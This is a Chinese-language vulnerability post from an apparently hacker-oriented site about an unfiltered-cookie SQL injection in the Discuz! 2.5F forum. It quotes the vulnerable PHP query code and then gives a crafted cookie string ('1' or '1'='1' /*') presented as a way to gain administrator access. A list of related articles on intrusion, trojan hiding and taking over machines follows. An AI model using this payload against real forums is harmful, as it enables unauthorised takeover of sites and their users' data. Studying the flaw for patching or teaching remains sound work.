Discuz! 2.5F cookie未过滤漏洞
漏洞提供:火狐技术联盟-我非我 [www.wrsky.com]漏洞说明:
discuz! 2.5f新版论坛 cookie未过滤 通过本地构造可获取管理员权限
具体描述:
文件include\common.php中87行
=================================code begin==========================================================
$discuz_uid = $_cookie['_discuz_uid']; //这里没有进行过滤检测
$discuz_pw = $_cookie['_discuz_pw'];
$discuz_secques = $_cookie['_discuz_secques'];
$newpm = $newpmexists = $sessionexists = $adminid = $adminglobal = 0;
$userinfo="m.uid as discuz_uid, m.username as discuz_user, m.password as discuz_pw, m.adminid, m.groupid, m.email, m.timeoffset,m.tpp, m.ppp, m.credit, m.timeformat, m.dateformat, m.signature, m.invisible, m.lastvisit, m.lastpost, m.newpm, m.accessmasks, m.regdate";
//这里直接就放入mysql执行了..
if($sid) {
if($discuz_uid) {
$query = $db->query("select s.sid, s.styleid, s.groupid='6' as ipbanned, $userinfo from $table_sessions s, $table_members m where m.uid=s.uid and s.sid='$sid' and concat_ws('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' and m.uid='$discuz_uid' and m.password='$discuz_pw' and m.secques='$discuz_secques'");
} else {
$query = $db->query("select sid, uid as sessionuid, groupid, groupid='6' as ipbanned, styleid from $table_sessions where sid='$sid' and concat_ws('.',ip1,ip2,ip3,ip4)='$onlineip'");
}
if($_dsession = $db->fetch_array($query)) {
$sessionexists = 1;
if(!empty($_dsession['sessionuid'])) {
$query = $db->query("select $userinfo from $table_members m where uid='$_dsession[sessionuid]'");
$_dsession = array_merge($_dsession, $db->fetch_array($query));
}
} else {
$query = $db->query("select sid, groupid, groupid='6' as ipbanned, styleid from $table_sessions where sid='$sid' and concat_ws('.',ip1,ip2,ip3,ip4)='$onlineip'");
if($_dsession = $db->fetch_array($query)) {
clearcookies();
$sessionexists = 1;
}
}
}
if(!$sessionexists) {
..........................................
====================================code end==========================================================
本地cookie构造方式:
sid=dagm7p; _cookietime=2592000; expand_menu=0__3; _discuz_uid=1' or '1'='1' /*; _discuz_pw=wofeiwo; _discuz_secques=hehe
漏洞演示动画下载:
http://down.juntuan.net/data/soft/778.html
下一篇:来自MSN官方网站的使用技巧集锦
↓相关文章:
- · 来自MSN官方网站的使用技巧集锦
- · WinXPSP2激活精彩问答
- · 修改MD5加密 提高网站安全
- · MSSQL注入攻击服务器与防护
- · TCP端口的作用、漏洞和操作建议
- · 国内10大bt站点
- · 用命令检查电脑是否被安装木马
- · 美国名牌大学的计算机网络课程网址
- · IPC$命令
- · 网管秘技八招
- · 实现重启后删除文件的工具
- · Windows 2000游戏能力大揭密
- · 网络故障诊断排除70例
- · 网络组建基础必备-网线制作
- · 腾讯QQ申请分析
- · MolyX Board原代码泄露漏洞
- · 不花钱拿IT认证
- · 用net start 可以启动肉鸡的命令一览
- · 提升(web)权限终极9技巧
- · 利用对方服务器漏洞远程注册DLL
- · 对win2k以上“隐藏虚拟目录”再分析
- · Windows变慢原因分析及解决方法
- · XP命令提示符详解及IP查询
- · 把手机变成遥控器--3分钟教你安装手机软件
- · IP碎片攻击源代码
- · 提高flash程序效率得方法
- · 通过Mysql入侵服务器
- · 104种木马的清除方法
- · 常见IP碎片攻击详解
- · 侵入最大的六合彩论坛系统---六合专用BBS
- · 我是这样走进韩国肉鸡的
- · 浅谈提升asp木马权限[续]--IIS下完美的图片后门
- · SQL开3389入侵实例记录
- · 入侵八大法
- · 旁注终结篇
- · 从建立用户到3389登陆
- · php后门隐藏技巧
- · Webmail攻防实战
- · PHP下实现端口复用/劫持
- · 简单关机重启注销及惊涛本地开3389源码
- · FTP 登陆错误详解
- · 电脑实用操作60招
- · Xp Home(家庭版)安装 IIS的解决方法
- · 探测远程主机上防火墙允许开放的端口
- · 浅谈NETSCREEN防火墙的抗攻击机制
- · All About RSS
- · 为你的 Real 影片加上定时的弹窗
- · 忘记Windows登录密码怎么办?
- · java新手必读,一些入门知识
- · 安全天使(sarticle)文章管理系统存在安全隐患
- · 如何挖掘ASP程序漏洞
- · 简单的黑留言板的方法
- · 浅谈提升asp木马权限[续]--IIS下完美的图片后门
- · DVBBS上传ASP文件漏洞详解(及抓包改包过程)
- · IP地址盗用技术简介以及防范措施综述
- · MYSQL用户root密码为空攻击方法
- · 一种隐藏ASP木马的方法
- · 女黑客雪蓓新作:自己丰衣足食—菜鸟制作木马的旅程
- · 网络入侵一般步骤及思路
- · 某高手总结的电脑技巧